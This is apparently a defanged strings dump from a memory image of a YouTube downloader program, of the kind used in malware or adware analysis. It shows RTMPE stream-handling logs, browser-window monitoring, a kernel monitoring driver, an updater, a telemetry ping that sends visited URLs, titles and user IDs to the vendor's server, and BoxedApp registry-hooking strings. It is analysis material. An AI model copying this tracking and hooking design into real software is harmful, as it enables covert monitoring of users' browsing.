[CClientRtmpe::operator =] Key Out: %p
[CClientRtmpe::operator =] Key In:
[CClientRtmpe::operator =]
[CClientRtmpe::OnHandshake] Step 3 - update the keystreams
[CClientRtmpe::OnHandshake] ___Error Step 3 - ___Error ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CClientRtmpe::OnHandshake] Step 2 - Client version: %x
[CClientRtmpe::OnHandshake] Step 2 - Client up time: %d
[CClientRtmpe::OnHandshake] Step 2 - Protocol: %d
[CKeysBank::Work] Exit...
[CKeysBank::Work] Enter...
[CKeysBank::Start]
[CKeysBank::Stop]
[CKeysBank::GetPublicKey] Remove Key, Total: %d
[CKeysBank::GenerateKey] Add Key, Total: %d
[CKeysBank::GenerateKey] ___Error DiffieHellman.GenerateKey
[CKeysBank::GenerateKey] ___Error DiffieHellman.Init
[CRtmpe::operator =] Key Out: %p
[CRtmpe::operator =] Key In:
[CRtmpe::operator =]
[CRtmpe::Initialize] Cache Writer: %p
[CRtmpe::ParseHeader] Protocol - RTMPE
[CRtmpe::ParseHeader] Protocol - RTMP
[CRtmpe::ParseHeader]
[CRtmpe::ParseData] Got all %d/%d bytes
[CRtmpe::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)
[CRtmpe::ParseData]
[CRtmpe::Encrypt] Encryped %d bytes, Key: %p
[CRtmpe::Decrypt] Decrypted %d bytes, Key: %p
[CRtmpe::ParseBuffer] Analyze Next Packet...
[CRtmpe::HandShake] Step 1: Complete
[CRtmpe::HandShake] ___Error Step 1: Writing client signature to server
[CRtmpe::HandShake] ___Error Step 1: DiffieHellman - GetPublicKey
[CRtmpe::HandShake] ___Error Keys Bank was unable to generate a pubic key
[CRtmpe::HandShake] Step 1: Start...
[CRtmpe::UpdateBuffer] Analyzed %d/%d bytes
[CRtmpe::UpdateBuffer] Handshake already completed
[CRtmpe::UpdateBuffer] Analyzing %d bytes...
[CRtmpStream::OnHandShake] ___Error - Unknown step
[CRtmpe::OnHandshake] Step 3 - Complete
[CRtmpe::OnHandshake] Step 3 - update the keystreams
[CRtmpe::OnHandshake] Step 3 - InitRC4Encryption
[CRtmpe::OnHandshake] ___Error Step 3: m_DiffieHellman - ComputeSharedSecretKey
[CRtmpe::OnHandshake] Step 3 - ComputeSharedSecretKey
[CRtmpe::OnHandshake] ___Error Step 3: Writing client response
[CRtmpe::OnHandshake] Step 3: Start...
[CRtmpe::OnHandshake] ___Error Step 2: *** Server response validation ***
[CRtmpe::OnHandshake] ___Warning - server version
[CRtmpe::OnHandshake] ___Error Step 2: Reading server response
[CRtmpe::OnHandshake] ___Error Step 2: *** Server signature validation ***
[CRtmpe::OnHandshake] Step 2 - Server version: %x
[CRtmpe::OnHandshake] Step 2 - Server up time: %d
[CRtmpe::OnHandshake] ___Error Step 2: Reading server signature
[CRtmpe::OnHandshake] Step 2 - Protocol: %d
[CRtmpe::OnHandshake] Step 2: Start...
[CRtmpPacket::Reset]
[CRtmpPacket::DumpHeader] Info Field: %d
[CRtmpPacket::DumpHeader] Packet Type: %d
[CRtmpPacket::DumpHeader] Packet Length: %d
[CRtmpPacket::DumpHeader] Absolute Time: %d
[CRtmpPacket::DumpHeader] Time: %d
[CRtmpPacket::DumpHeader] Channel: %d
[CRtmpPacket::DumpHeader] Header Type: %d
[CRtmpPacket::DumpHeader] Header Size: %d
[CRtmpPacket::DumpHeader] Header Byte: 0x%.02X
[CRtmpPacket::ParseHandshakeHeader] ___Error - Header already parsed
[CRtmpPacket::ParseFlvHeader] Absolute Time: %d
[CRtmpPacket::ParseFlvHeader] Packet Length: %d
[CRtmpPacket::ParseFlvHeader] Packet Type: %d
[CRtmpPacket::ParseFlvHeader] Channel: %d
[CRtmpPacket::ParseFlvHeader] Header Type: %d
[CRtmpPacket::ParseFlvHeader] Header Size: %d
[CRtmpPacket::ParseFlvHeader] ___Warning - %d/%d header bytes
[CRtmpPacket::ParseFlvHeader] ___Error - No bytes to analyze
[CRtmpPacket::ParseFlvHeader] ___Error - Header already parsed
[CRtmpPacket::AppendData] Appended: %d (Total: %d/%d)
[CRtmpPacket::AppendData] ___Error - out of memory
[CRtmpPacket::AppendData] ___Warning - no bytes to append
[CRtmpPacket::Allocate] Allocated %d (Total: %d)
[CRtmpPacket::ParseHeader] ___Error - Channel: %d > 9
[CRtmpPacket::ParseHeader] Extended Time: %d
[CRtmpPacket::ParseHeader] Info Field: %d
[CRtmpPacket::ParseHeader] ___Warning - Packet Length: %d > 1M
[CRtmpPacket::ParseHeader] Packet Type: %d
[CRtmpPacket::ParseHeader] Packet Size: %d
[CRtmpPacket::ParseHeader] Time: %d
[CRtmpPacket::ParseHeader] Channel: %d
[CRtmpPacket::ParseHeader] Header Type: %d
[CRtmpPacket::ParseHeader] Header Size: %d
[CRtmpPacket::ParseHeader] Header Byte: 0x%.02X
[CRtmpPacket::ParseHeader] ___Warning - %d/%d header bytes
[CRtmpPacket::ParseHeader] ___Error - No bytes to analyze
[CRtmpPacket::ParseHeader] ___Error - Header already parsed
[CRtmpParser::Stop]
[CRtmpParser::ProcessData] ___Error - Unknown Packet Type: %d, Offset: %d
[CRtmpParser::ProcessData] Analyze Data: %d bytes
[CRtmpParser::ProcessData] ___Warning - Packet not ready for Data Processing
[CRtmpParser::OnHandshake] Step 4: Complete
[CRtmpParser::OnHandshake] Step 3: Complete
[CRtmpParser::OnHandshake] Step 2 - Server version: %d.%d.%d.%d
[CRtmpParser::OnHandshake] Step 2 - Server up time: %d
[CRtmpParser::OnHandshake] Step 1 - Client version: %d.%d.%d.%d
[CRtmpParser::OnHandshake] Step 1 - Client up time: %d
[CRtmpParser::OnHandshake] Protocol State: %d
[CRtmpParser::OnAudio]
[CRtmpParser::OnVideo]
[CRtmpParser::OnFLV]
[CRtmpParser::OnData]
[CRtmpParser::SetTimeStartPosition] Time: %d
[CRtmpParser::SetTimeEndPosition] Time: %d
[CRtmpParser::Close]
[CRtmpParser::OnError]
[CRtmpParser::SetAbsoluteTime] Client Absolute Time: %d (Max: %d)
[CRtmpParser::SetAbsoluteTime] Server Absolute Time: %d (Max: %d)
[CRtmpParser::Sync - %p]
[CRtmpParser::ParseFlvHeader]
[CRtmpParser::ParseData] Accumulated all %d/%d bytes
[CRtmpParser::ParseData] Chunk not ready
[CRtmpParser::ParseData] Going to append %d bytes
[CRtmpParser::ParseData] Got all %d/%d bytes
[CRtmpParser::ParseData] ___Warning - wait for all packet data to arraive (%d/%d)
[CRtmpParser::ParseData] ___Warning no data
[CRtmpParser::ParseData]
[CRtmpParser::ParseDataType] ___Error - Unknown Data Type: %d, Offset: %d
[CRtmpParser::ParseDataType] Date %f %d (Offset: %d)
[CRtmpParser::ParseDataType] Static Array %d (Offset: %d)
[CRtmpParser::ParseDataType] EOF Object (Offset: %d)
[CRtmpParser::ParseDataType] ECMA Array %d (Offset: %d)
[CRtmpParser::ParseDataType] Object (Offset: %d)
[CRtmpParser::OnChangeChunkSize] %d -> %d
[CRtmpParser::OnChangeChunkSize]
[CRtmpParser::OnReadBytes] Bytes read: %d
[CRtmpParser::OnReadBytes]
[CRtmpParser::OnMetadata]
[CRtmpParser::Reset - %p]
[CRtmpParser::ReadObject] ___Error %s - %d (Offset: %d) - Unknown Data Type
[CRtmpParser::ReadObject] EOF Object (Offset: %d)
[CRtmpParser::ReadObject] %s - Long String: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Date: %g (Offset: %d)
[CRtmpParser::ReadObject] %s - Static Array: %d (Offset: %d)
[CRtmpParser::ReadObject] %s - ECMA Array: %d (Offset: %d)
[CRtmpParser::ReadObject] %s - NULL (Offset: %d)
[CRtmpParser::ReadObject] %s - Object (Offset: %d)
[CRtmpParser::ReadObject] %s - String: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Boolean: %s (Offset: %d)
[CRtmpParser::ReadObject] %s - Numeric: %g (Offset: %d)
[CRtmpParser::ParseHandshakeHeader] Protocol - RTMPE
[CRtmpParser::ParseHandshakeHeader] Protocol - RTMP
[CRtmpParser::ParseHandshakeHeader]
[CRtmpParser::ParseHeader] Absolute Time: %d
[CRtmpParser::ParseHeader] New Time: %d
[CRtmpParser::ParseHeader] New Absolute Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Info Field: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer Bytes: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer Length: %d
[CRtmpParser::ParseHeader] _Prev Packet - Buffer: %p
[CRtmpParser::ParseHeader] _Prev Packet - Packet Type: %d
[CRtmpParser::ParseHeader] _Prev Packet - Packet Size: %d
[CRtmpParser::ParseHeader] _Prev Packet - Absolute Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Time: %d
[CRtmpParser::ParseHeader] _Prev Packet - Original Header Size: %d
[CRtmpParser::ParseHeader]
[CRtmpParser::UpdateBufferFromServer] Analyzed no bytes
[CRtmpParser::UpdateBufferFromServer] Analyzed %d/%d, Write: %d, Discard: %d
[CRtmpParser::UpdateBufferFromServer] Analyze Next Buffer... (Left: %d)
[CRtmpParser::UpdateBufferFromServer] Decrypt %d/%d bytes
[CRtmpParser::UpdateBufferFromServer] *** Data file Ended at Absolute Time: %d ***
[CRtmpParser::UpdateBufferFromServer] *** Data file Started at Absolute Time: %d ***
[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard the rest of the data!
[CRtmpParser::UpdateBufferFromServer] Decrypt %d bytes
[CRtmpParser::UpdateBufferFromServer] Parser was stopped - discard all data!
[CRtmpParser::UpdateBufferFromServer] Analyzing %d bytes...
[CRtmpParser::UpdateBufferFromClient] Analyzed %d/%d, Write: %d, Discard: %d
[CRtmpParser::UpdateBufferFromClient] Encrypt %d bytes
[CRtmpParser::UpdateBufferFromClient] Decrypt %d/%d bytes
[CRtmpParser::ParseBuffer] Analyze Next Packet... (Left: %d)
[CRtmpParser::UpdateBufferFromClient] Decrypt %d bytes
[CRtmpParser::UpdateBufferFromClient] ___Warning - Wait for the server handshake to complete...
[CRtmpParser::UpdateBufferFromClient] Analyzed no bytes
[CRtmpParser::UpdateBufferFromClient] Analyzing %d bytes...
[CRtmpParser::operator = %p] <= %p
[CRtmpParser::ParseFlvBuffer] Analyze Next FLV Buffer...
[CRtmpParser::AddDownloadFlowCommand] Method: %s -> Command: %s, Param: %d
[CRtmpParser::OnPing] SWFVerification
[CRtmpParser::OnPing] Time: %d
[CRtmpParser::OnPing] -- Unknown %d --
[CRtmpParser::OnPing] Stream buffer ready %d
[CRtmpParser::OnPing] Pause time: %d
[CRtmpParser::OnPing] Stream buffer empty %d
[CRtmpParser::OnPing] Pong %d
[CRtmpParser::OnPing] Stream is recorded %d
[CRtmpParser::OnPing] Ping %d
[CRtmpParser::OnPing] Stream dry %d
[CRtmpParser::OnPing] Stream EOF %d
[CRtmpParser::OnPing] Stream begin %d
[CRtmpParser::OnPing] Type: %d
[CRtmpParser::OnPing]
[CRtmpParser::OnServerBW] Server Bandwidth: %d
[CRtmpParser::OnServerBW]
[CRtmpParser::OnClientBW] Client Bandwidth: %d
[CRtmpParser::OnClientBW]
[CRtmpParser::OnInvoke] ___Error - Unknown Invokde method: %s
[CRtmpParser::OnInvoke] setBandwidthLimit( %g, %g )
[CRtmpParser::OnInvoke] getStats
[CRtmpParser::OnInvoke] secureTokenResponse: Token = %s
[CRtmpParser::OnInvoke] closeStream: StreamID = %g
[CRtmpParser::OnInvoke] deleteStream: StreamID = %g
[CRtmpParser::OnInvoke] releaseStream: PlayPath = %s
[CRtmpParser::OnInvoke] startStream: PlayPath = %s
[CRtmpParser::OnInvoke] createStream: StreamID = %g
[CRtmpParser::OnInvoke] %s( '%s', '%s', '%s' )
[CRtmpParser::OnInvoke] %s( '%s', '%s' )
[CRtmpParser::OnInvoke] seek( '%d' )
[CRtmpParser::OnInvoke] %s( '%d', '%g' )
[CRtmpParser::OnInvoke] %s( '%s' ), PacketInfo: %d
[CRtmpParser::OnInvoke] onStatus - code: %s, level: %s
[CRtmpParser::OnInvoke] _error - code: %s, level: %s
[CRtmpParser::OnInvoke] %s( '%s' )
[CRtmpParser::OnInvoke] _result createStream: StreamID = %g
[CRtmpParser::OnInvoke] _result connect - AMF3
[CRtmpParser::OnInvoke] _result connect: %s
[CRtmpParser::OnInvoke] _result for Method: %s
[CRtmpParser::OnInvoke] Method: %s
[CRtmpParser::OnInvoke]
Download Helper SendMsgToBtn, url: %s
Could not find converter registry key, %ws
Could not create process, error %x, proc %ws
RegContentType%d
RegRawData%d
RegProtocol%d
RegAgent%d
RegCookie%d
1.0.1.0
RegFileName%d
RegUrl
RegURL%d
%ws_%d.log
- Mozilla Firefox
- Windows Internet Explorer
opera
firefox
chrome
OPERA
opera.exe
safari.exe
firefox.exe
iexplore.exe
chrome.exe
explorer.exe
Google Chrome
Chrome_WidgetWin_1
Firefox
FirefoxBrowserWindow Found browser window, 0x%x
FirefoxBrowserWindow Found button window, 0x%x
IE9BrowserWindow Found browser window, 0x%x
IE9BrowserWindow Found button window, 0x%x
OperaBrowserWindow Found browser window, 0x%x
OperaBrowserWindow Found button window, 0x%x
Opera
SafariBrowserWindow Found browser window, 0x%x
SafariBrowserWindow Found button window, 0x%x
hXXp://VVV.youtube.com/watch?v=
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.79 Safari/537.1
YTParser url not valid %ws
SBMonitor.log
Error no signature found at %s
GetVideoUrlAndSizeFromWatchPage Could not extract url_encoded_fmt_stream_map params.
GetVideoUrlAndSizeFromWatchPage
YTParser could not find valid url, not downloading
hXXp://VVV.youtube.com/get_video_info?video_id=
GetVideoUrlAndSizeFromVideoInfo
Failed processing urls from watch page.
reportLevel
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
(build %d)
Windows 2000
Windows XP
Web Edition
Windows Server 2003,
Windows XP Professional x64 Edition
Windows Home Server
Windows Storage Server 2003
Windows Server 2003 R2,
Web Server Edition
Windows Server 2008 R2
Windows 8
Windows 7
Windows Server 2008
Windows Vista
{X-hX-hX-XX-XXXXXX}sbmntr.sys
Converter.exe
DownloadHelper.exe
HELPEREXELOCATION
YTDownloader.exe
MONITOREXELOCATION
hXXp://VVV.ytdownloader.com/feedback/
Driver - %ws: %x
\\.\SBMonitor
net.exe
Driver installed, NOT loaded: %s
Driver installed, loaded from %s
Software\Opera Software\
%programFiles%\Opera\opera.exe
Apple Application Support\WebKit2WebProcess.exe
Safari.exe
%programFiles%\Safari\Safari.exe
%programFiles%\Mozilla Firefox\firefox.exe
IEXPLORE.EXE
%programFiles%\Internet Explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%LOCALAPPDATA%\Google\Chrome\Application\chrome.exe
converter.exe
webm
[CMonitor::AddAppIdToDriver]___Error: Could not add App Ids (%x).
Same as one of buttons PID %d
Same as our PID %d
[CMonitor::EnableMonitoring]___Error: Could not enable monitoring device (%x).
___Error: Could not open device (%u).
-pid %d -size %s -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -useragent %s -resolution %s -protocol http
CMonitor::BuildParams Already created similar url, %ws
CMonitor::BuildParams Button exists for similar url, %ws
youtube.com
-pid %d -size %I64d -sizeBytes %I64d -type %s -url %s -cookie %s -referer %s -host %s -ads %s -useragent %s -protocol http
-pid %d -rawdata %s -protocol rtmp -duration %s -resolution %s
Fwpuclnt.dll
https
Not application/octet-stream video and the size is bigger than %d, %d
Not application/octet-stream video and the size is smaller than %d
Not FLV video and the size is smaller than %d
vid2.ak.dmcdn.net
CHttpMonitor::SameYoutubeVideo Same params page id = %s, itag = %s
CHttpMonitor::SameYoutubeVideo DASH same params page id = %s, itag = %s
CHttpMonitor::SameYoutubeVideo Same watch page %s
HTTP_Version_String
[HttpParser::ParseLine] ___Error: The field separator was not found in the line:
VVV.google.com
Global\{9DA0BEED-7248-450a-B27C-C0409BDC377D}YTD-icon-128x128.png
Advapi32.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
%saction=%s&userid=%s&usid=%s&aff=%s&v=%s&url=%s&title=%s&pingtext=%s&protocol=%s&size=%I64d&ref=%s&browser=%s
hXXp://rep.ytdownloader.com/app/ping.ashx?
%s%s%s
[RtmpDownloader::CreateProcessStdoutPipe] ___Error SetHandleInformation: %d
[RtmpDownloader::CreateProcessStdoutPipe] ___Error CreatePipe: %d
[RtmpDownloader::CreateProcessStdoutPipe] ___Error StdOut CloseHandle: %d
rtmpdump.exe
[RtmpDownloader::ReadFromPipe] --- Download Ends ---
[RtmpDownloader::ReadFromPipe] --- Download Begins ---
[RtmpDownloader::RunCommandLine] ___Error CreateProcess: %s. LE: %d
Error : failed to run FFmpeg - %d
[RtmpDownloader::RunCommandLine] ___Error CreateProcessStdoutPipe
Failed to run update (%x).
Trying to execute an update.
CUpdater::parseUpdateXML Set report level to %ws
REPORT
CMDLINE
%sid=%d_r=%lld_err=%d
%suserid=%s&aff=%s&v=%s
hXXp://VVV.ytdownloader.com/app/update.ashx?
mscoree.dll
KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
ADVAPI32.DLL
WUSER32.DLL
<>"#%{}|\^~[]`' ?&%Program Files%\YTDownloader\YTDownloader.exe
1.0.3.9
YTDownloader.exe_2380_rwx_10000000_000E6000:
.text
`.rdata
@.data
.rsrc
@.reloc
</.uCU
FtPh8
u$D
<p.uH
FTPSW
The embedding BoxedApp into child processes: %s
GetCommandLineA preparing to intercept...done
GetCommandLineW preparing to intercept...done
The command line overriding: %s
Get old args...done
Get current dir...done
Get the extension...done
Get exe dir...done
Get exe dir...
550e832f-a497-4eb7-bb40-8cc856f6d152
BoxedAppSDK::FileSystem::CFileSystem::DoFileOperation_FullPath
, passed pBehavior returns FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create not a directory
, passed pBehavior doesn't support IVirtualFile
, passed pBehavior doesn't return FILE_ATTRIBUTE_DIRECTORY attribute, but it's requested to create a directory
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
[Isolation] DoFileOperation_FullPath: CreateFileDeletedInformationFile
BoxedAppSDK::Registry::Impl::CRegistry::GetAllChildsKeys
NtEnumerateKey() returned unexpected error, status =
, RegTree::IEnumKeyNode::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::EnumVirtualRegKeys
, RegTree::IKeyNode::EnumKeys() failed, hr =
: IVirtualKeyHandle::CreateKey() failed, hr =
: RegTree::IEnumKeyNode::GetNext() failed, hr =
: GetAllChildsKeys() failed, status =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryKeyInternal
: RegTree::IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetFullRegKeyPath
error, IVirtualKeyHandle_GetFullPath() returned
Invalid key information class:
KeySetHandleTagsInformation is not supported for virtual handle
KeySetDebugInformation is not supported for virtual handle
KeySetVirtualizationInformation is not supported for virtual handle
KeyControlFlagsInformation is not supported for virtual handle
KeyWow64FlagsInformation is not supported for virtual handle
We still don't process NtQueryObject / ObjectBasicInformation for virtual key handles
We still don't process NtQueryObject / ObjectTypeInformation for virtual key handles
: IVirtualKeyHandle::Rename() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtRenameKeyInternal
: RegTree::IKeyNode::Rename() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::SearchNodePointsToRealKey
: CRegistry::SetIsolationMode() failed for the hKey =
BoxedAppSDK::Registry::Impl::CRegistry::CreateNodePointsToRealKey
: result hkey =
: IVirtualKey::CreateKey() failed, hr =
: we can't create a virtual key with its own behavior under another virtual key
: Handles::CreateVirtualKeyHandle() failed, hr =
: IVirtualKey::OpenKey() failed, hr =
: GetFullRegKeyPath() failed for the hKey =
: Handles::IVirtualKeyHandle::CreateKey() failed and returned
: passed pBehavior is not NULL, but parent key is virtual, so we can't create a key
BoxedAppSDK::Registry::Impl::CRegistry::CreateVirtualRegKeyHelper
: lpSubKey: "
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKey
BoxedAppSDK::Registry::Impl::CRegistry::SearchStartingFromRealKeyEx
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
reg:NtCreateKey(
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyProcessView
RegTree::IEnumKeyNode::GetNext(), hr =
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtOpenKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtEnumerateKey(
reg:NtDeleteKey(
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
kernel32.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
VirtualDllWithSameImport.dll
BoxedAppSDK_RemoveExeFromAttachableChildProcListW
BoxedAppSDK_RemoveExeFromAttachableChildProcListA
BoxedAppSDK_AddExeToAttachableChildProcListW
BoxedAppSDK_AddExeToAttachableChildProcListA
BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListA
BoxedAppSDK_RemoveExeFromAttachableChildProcExclusionListW
BoxedAppSDK_AddExeToAttachableChildProcExclusionListA
BoxedAppSDK_AddExeToAttachableChildProcExclusionListW
BoxedAppSDK_GetRegKeyIsolationModeA
BoxedAppSDK_GetRegKeyIsolationModeW
BoxedAppSDK_SetRegKeyIsolationModeA
BoxedAppSDK_SetRegKeyIsolationModeW
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_AddVirtualRegKeyW
BoxedAppSDK_AddVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
_CorExeMain
ole32.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
ntdll.dll
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
.idata
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegDeleteKeyW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyW
